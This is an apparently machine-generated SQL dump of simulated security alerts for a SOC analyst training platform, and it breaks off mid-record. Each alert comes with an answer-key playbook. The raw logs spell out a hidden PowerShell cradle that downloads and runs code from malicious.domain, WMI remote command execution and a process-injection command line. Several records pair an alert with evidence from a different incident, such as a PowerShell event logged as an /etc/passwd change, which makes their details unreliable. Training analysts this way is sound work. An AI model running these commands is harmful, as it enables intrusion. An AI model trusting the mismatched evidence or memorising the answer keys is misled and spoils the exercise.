(1757, 'Fileless Malware Execution via PowerShell', 'high', 'Anomali', 'Detected fileless malware execution using PowerShell on a critical server, indicative of APT41 activity.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:22:13Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"svc_backup\",\"hostname\":\"SERVER-DB01\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a common pattern for fileless malware attacks\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious.domain\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for hosting malware payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41\'s use of fileless malware via PowerShell indicates sophisticated attack methods targeting critical infrastructure.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.229Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:22:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"SERVER-DB01\\\",\\\"command_line\\\":\\\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.domain/payload\')\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1758, 'Lazarus Group Spear-Phishing Attempt', 'critical', 'ThreatConnect', 'Received a spear-phishing email with a malicious URL, attributed to Lazarus Group, targeting executive staff.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:11:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"ceo@company.com\",\"hostname\":\"CEO-LAPTOP\",\"email_sender\":\"john.doe@trusted-partner.com\",\"request_body\":\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/important.doc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sender email used in spear-phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The use of a trusted partner\'s domain as a spoofed sender exemplifies Lazarus Group\'s sophisticated phishing techniques.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.230Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:11:45Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"CEO-LAPTOP\\\",\\\"email_sender\\\":\\\"john.doe@trusted-partner.com\\\",\\\"request_body\\\":\\\"Dear CEO, please review the attached document: http://malicious-url.com/important.doc\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1759, 'Cozy Bear Lateral Movement Detected via WMI', 'high', 'MISP', 'Suspicious WMI activity detected between internal machines, indicating potential lateral movement by Cozy Bear.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.5\",\"dst_ip\":\"10.1.1.10\",\"username\":\"admin\",\"hostname\":\"HR-SERVER\",\"command_line\":\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Usage of WMI for unauthorized command execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Cozy Bear\'s use of WMI for lateral movement is consistent with their known TTPs for network infiltration.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c 
whoami\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.234Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.1.5\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"HR-SERVER\\\",\\\"command_line\\\":\\\"wmic /node:10.1.1.10 process call create \'cmd.exe /c whoami\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1760, 'Fancy Bear Brute Force Attack from Unusual Location', 'high', 'Proofpoint', 'Detected multiple failed login attempts from an IP associated with Fancy Bear, targeting the VPN portal.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:47:25Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"vpn_user\",\"hostname\":\"VPN-GATEWAY\",\"failed_attempts\":35}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for brute force attacks multiple times\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the VPN gateway\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username targeted in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack pattern and source IP align with known Fancy Bear activities targeting VPN infrastructures.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Fancy Bear Brute Force Attack from Unusual Location\",\"date\":\"2026-03-15T20:58:16.236Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1761, 'Legitimate Admin Activity Misclassified as Lateral Movement', 'medium', 'Wazuh', 'Detected internal admin activity misinterpreted as lateral movement due to unusual use of PowerShell across the network.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"IT-SERVER\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the admin server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP of the admin activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine script execution for maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine administrative tasks were misclassified due to the nature of PowerShell usage across the network.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1762, 'False Detection of SQL Injection on Public Website', 'low', 'Firewall', 'Firewall alert triggered by legitimate parameter inputs misidentified as SQL injection attempts.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.30\",\"username\":\"guest\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"SELECT * FROM users WHERE username=\'admin\' AND password=\'pass123\'\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"SELECT * FROM users WHERE username=\'admin\' AND password=\'pass123\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate parameter input for application testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The alert was triggered by normal application testing activities, not an actual SQL injection attempt.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1763, 'APT41 Fileless Malware Detected via Process Hollowing', 'critical', 'ThreatConnect', 'A process hollowing attack initiated by APT41 was detected on an internal server. The malware operates in memory only, making it difficult to detect using traditional methods.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:24:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"hostname\":\"corp-server-01\",\"command_line\":\"svchost.exe --inject --target=explorer.exe\",\"file_hash\":\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for fileless malware activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to APT41 fileless malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"svchost.exe --inject --target=explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as process hollowing technique\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 is a known actor utilizing fileless malware techniques like process hollowing.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject 